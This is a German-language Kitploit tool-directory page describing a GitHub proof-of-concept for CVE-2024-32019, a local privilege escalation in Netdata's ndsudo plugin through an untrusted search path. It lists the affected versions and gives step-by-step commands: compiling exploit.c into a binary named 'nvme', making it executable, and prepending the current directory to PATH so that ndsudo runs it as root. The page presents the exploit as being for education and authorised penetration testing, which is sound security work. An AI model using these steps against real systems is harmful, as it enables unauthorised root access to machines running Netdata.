Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-32019-POC — Proof-of-concept-Exploit für CVE-2024-32019, der eine lokale Rechteausweitung über einen nicht vertrauenswürdigen Suchpfad im ndsudo-Plugin von Netdata demonstriert. Enthält Kompilieranweisungen und Bereitstellungsschritte. | Kitploit
Tools/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
Privilege EscalationExploitationPenetrationstestsLernen & BildungBinary-Exploitation
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

Proof-of-concept-Exploit für CVE-2024-32019, der eine lokale Rechteausweitung über einen nicht vertrauenswürdigen Suchpfad im ndsudo-Plugin von Netdata demonstriert. Enthält Kompilieranweisungen und Bereitstellungsschritte.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
52vor 1 JahrNoch nicht geprüft

⚠️ CVE-2024-32019 - PoC

📌 Betroffene Versionen

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ Beweis des Konzepts

CVE-2024-32019 — ndsudo lokale Privilegieneskalation über nicht vertrauenswürdigen Suchpfad.

🔧 Exploit kompilieren

root@kitploit:~
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 Auf dem Zielcomputer bereitstellen

  1. Übertragen Sie die kompilierte Binärdatei auf die anfällige Maschine.

  2. Machen Sie sie ausführbar:

    root@kitploit:~
    chmod +x nvme
    
  3. Nutzen Sie die anfällige Binärdatei über PATH-Manipulation aus (verwenden Sie denselben Pfad, in den Sie Ihre Binärdatei hochgeladen haben):

    root@kitploit:~
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 Referenz

  • Netdata-Sicherheitshinweis - GHSA-pmhq-4cxq-wj93

⚖️ Haftungsausschluss und Bedingungen

Dieser Proof-of-Concept (PoC)-Code wird nur für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.

  • Keine Erlaubnis wird erteilt, diesen Code zu ändern, weiterzuverteilen oder für andere Zwecke zu verwenden.
  • Unbefugte Verwendung oder Änderung kann illegal und unethisch sein.
  • Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden.
Tool herunterladen